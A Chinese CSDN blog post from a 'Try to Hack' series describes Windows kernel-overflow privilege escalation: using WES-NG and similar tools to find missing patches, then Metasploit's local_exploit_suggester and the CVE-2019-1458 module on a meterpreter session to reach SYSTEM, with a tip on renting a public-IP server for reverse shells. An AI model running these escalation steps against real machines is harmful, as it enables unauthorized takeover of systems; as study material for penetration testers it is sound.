【Try to Hack】Windows内核溢出漏洞提权

于 2022-07-10 14:14:29 发布
阅读量577 收藏
点赞数
文章标签: 提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55675216/article/details/125704470
版权

📒博客主页:开心星人的博客主页
🔥系列专栏:Try to Hack
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年7月10日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

📌导航小助手📌

🍫提权用到命令

在这里插入图片描述
whoami /priv

🍫补丁筛选

vulmap
Windows Exploit Suggester - Next Generation (WES-NG)
WindowsVulnScan

WES-NG在Windows平台最好用

vulmap

vulmap:Linux的工具挺好用,但是对于Windows系统层面不太适用。
在这里插入图片描述
必须通过powershell运行(所以有点鸡肋,我们可能一般拿到的是cmd窗口,或者web后门没有powershell环境)
在这里插入图片描述
没有发现什么漏洞(vulmap在Windows平台很鸡肋)

WES-NG

python.exe wes.py systeminfo.txt -o vuln.csv
在这里插入图片描述
在这里插入图片描述
缺失3个补丁,导致可能存在103个漏洞

我们只需要得到服务器的systeminfo信息即可!!!

WindowsVulnScan

也是需要执行powershell脚本
在这里插入图片描述

🍫MSF

优先使用msf,但是msf并不每天都会进行更新最新的CVE。所以,如果最新的CVE没有更新,则利用特定的EXP。

在实战中利用MSF,建议购买服务器(因为外网服务器会去连接我们的主机,所以要有公网ip),2核4G或2核2G,安装Ubuntu系统,只安装MSF

首先得要获得meterpreter权限
backgroud
search 某某CVE
use 某一个模块
set session 刚才session的值 会使用这个exp去攻击我们刚才的会话
需要设置一个反弹shell的payload,并且去换一个端口进行监听

#查询补丁

meterpreter> run post/windows/gather/enum_patches   #可以直接查看哪些补丁没有打
[+] KB2999226 installed on 11/25/2020
[+] KB976902 installed on 11/21/2010

#查询Exp

msf> use post/multi/recon/local_exploit_suggester   #该模块用于快速识别系统中可能被利用的漏洞
msf> set LHOST <攻击机IP>
msf> set SESSION <session_id>
msf> run

# 利用示例

msf> use exploit/windows/local/cve_2019_1458_wizardopium 
msf> set SESSION <session_id>
msf> run
meterpreter> getuid
Server username: NT AUTHORITY\SYSTEM

看这篇
Windows内核溢出漏洞提权
https://blog.csdn.net/qq_36119192/article/details/104280692

🍫利用CVE对应的EXP

windows-kernel-exploits
在这里插入图片描述

开心星人
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
[网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑示例(一)
杨秀璋的专栏
04-10 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可能利用此漏洞远程无需用户验证,执行恶意代码并获取机器的完全控制。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell等获取5个flag。由于hack the box速度堪忧,作者选择了Vulnhub靶场,希望深入分析来
try-hack-me:TryHackMe.com实验室
04-04
在"try-hack-me-main"这个压缩包中,很可能是包含了TryHackMe某个实验室的主要文件和资源。这可能包括虚拟机映像、练习文档、解决方案指南、示和挑战,以及可能的脚本或代码示例。用户在解压后,可以通过导入这些...
Windows内核漏洞学习-内核利用程序之池溢出
WocW的博客
05-24 747
0x00:前言 昨天阅读了内核池的一些原理,与Linux堆还是有很多相似的。今天继续调试HEVD中池溢出攻击。参考的原文: 传送门 0x01:漏洞原理 漏洞源码: NTSTATUS TriggerPoolOverflow(IN PVOID UserBuffer, IN SIZE_T Size) { PVOID KernelBuffer = NULL; NTSTATUS Status = STATUS_SUCCESS; PAGED_CODE(); __try {
linux栈溢出检测方法有哪些,Linux内核溢出检测
weixin_35440082的博客
05-13 889
8种机械键盘轴体对比本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选?借助Linux debugfs来检测内核栈使用状态及溢出检测工具Linux内核中有KASAN和kmemcheckKASAN只支持arm64和x86,见内核文档Documentation/features/debug/KASAN/arch-support.txtkmemcheck仅支持x86因此在arm下使用debugfs...
[03] HEVD 内核漏洞之UAF
abns44296的博客
07-24 355
作者:huity出处:https://www.cnblogs.com/huity35/p/11240997.html版:本文版归作者所有。文章在博客园、看雪、个人博客同时发布。转载:欢迎转载,但未经作者同意,必须保留此段声明;必须在文章中给出原文连接;否则必究法律责任。 0x00 前言 上一节研究了内核溢出相关问题,事实上利用已经成功了, 但是源码在vs环境下编译的驱动文件和...
Linux:内核kernel启动流程
weixin_44498318的博客
06-10 1806
1. Linux启动流程框图 ENTRY(stext) (arch/arm/kernel/head.S) |_ safe_svcmode_maskall (arch/arm/include/asm/assembler.h) |_ __lookup_processor_type (arch/arm/kernel/head-common.S) |_ __vet_atags (arch/arm/kernel/head-common.S) |_ __create_page_tables (arch/arm/
windows 弹shell_一步步学写Windows下的Shellcode
weixin_39602560的博客
10-21 654
如何在WIndows下编写一个shellcode?为什么会问这个问题,前段时间在做win下的Exploit,但是都是使用大佬写的shellcode,无法实现个人的一些需求。而网络上编写shellcode的教程大多是关于Linux的,加之顺带学习PE文件结构,所以打算写一篇关于Windows 下shellcode的编写,为要编写Shellcdoe的读者供一些参考。摘要:在C语言中,调用一...
Linux系统内核启动代码分析
芋圆_钰源
09-01 516
一、vmlinux、zImage与uImage之间的关系 vmlinux是编译出来的最原始的内核文件,未压缩;zImage是经过gzip压缩后的文件;uImage是u-boot专用的映像文件,它是在zImage之前加上一个长度为64字节的tag。 注:影响系统启动速度的关键因素分析 看到这,我本想不压缩以升启动速度,但是实验发现,影响系统启动速度的关键因素还
Linux内核启动流程(简介)
weixin_44708624的博客
12-14 825
1. vmlinux.lds 首先分析 Linux 内核的连接脚本文件 arch/arm/kernel/vmlinux.lds,通过链接脚本可以找到 Linux 内核的第一行程序是从哪里执行的: 第 493 行的 ENTRY 指明了了 Linux 内核入口,入口为 stext,stext 定义在文件arch/arm/kernel/head.S 中 , 因 此 要 分 析 Linux 内核的启动流...
Linux 3.2.8 内核启动过程
我是唐
09-21 292
一、vmlinux、zImage与uImage之间的关系          vmlinux是编译出来的最原始的内核文件,未压缩;zImage是经过gzip压缩后的文件;uImage是u-boot专用的映像文件,它是在zImage之前加上一个长度为64字节的tag。 注:影响系统启动速度的关键因素分析 看到这,我本想不压缩以升启动速度,但是实验发现,影响系统启动速度的关键因素还是数据从Nan...
vb.rar_VB _进程
09-20
在这个“vb.rar_VB _进程”的主题中,我们主要关注的是如何在VB.NET环境中实现进程限的升,以便能够执行如杀掉任何进程等需要更高限的操作。 在Windows操作系统中,每个进程都有自己的安全属性,包括...
docker,no more mirrorlist to try
07-09
安装docker报错no more mirrorlist to try,怎么解决? 这里网上查了很多子资源,有说检查网络的,有说清空yum.repo.d文件夹的,有说重新下载yum源的,这些方法对我来说不管用,下面供我遇到的情况及其解决办法,...
TryHackMe-Writeups:TRY HACK ME的PDF文件
03-07
TryHackMe-Writeups:TRY HACK ME的PDF文件
await-to-js:异步await包装器,可轻松处理错误,而无需try-catch
02-28
import to from 'await-to-js' ; // If you use CommonJS (i.e NodeJS environment), it should be: // const to = require('await-to-js').default; async function asyncTaskWithCb ( cb ) { let err , user , ...
ASP窗帘销售网站平台设计(源代码+论文).rar
07-21
ASP窗帘销售网站平台设计(源代码+论文)
python《全国大学生数学建模竞赛2019年C题-机场的出租车问题》+源代码+论文+爬虫数据
07-21
<项目介绍> - 关键词:排队论 动态规划 网络爬虫 循环遍历算法 收益差值模型 时间消耗评估 模型 - 不懂运行,下载完可以私聊问,可远程教学 该资源内项目源码是个人的毕设,代码都测试ok,都是运行成功后才上传资源,答辩评审平均分达到96分,放心下载使用! 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请放心下载使用! 2、本项目适合计算机相关专业(如计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载学习,也适合小白学习进阶,当然也可作为毕设项目、课程设计、作业、项目初期立项演示等。 3、如果基础还行,也可在此代码基础上进行修改,以实现其他功能,也可用于毕设、课设、作业等。 下载后请首先打开README.md文件(如有),仅供学习参考, 切勿用于商业用途。 --------
JAVA源码JAVA实现超级玛丽JAVA源码JAVA实现超级玛丽
07-21
JAVA源码JAVA实现超级玛丽JAVA源码JAVA实现超级玛丽
crazyflie国外开源微型四轴所有资料.7z
07-21
crazyflie国外开源微型四轴所有资料.7z
Linux指令大纲(部分)
最新发布
07-21
Linux指令大纲(部分)

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

开心星人

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值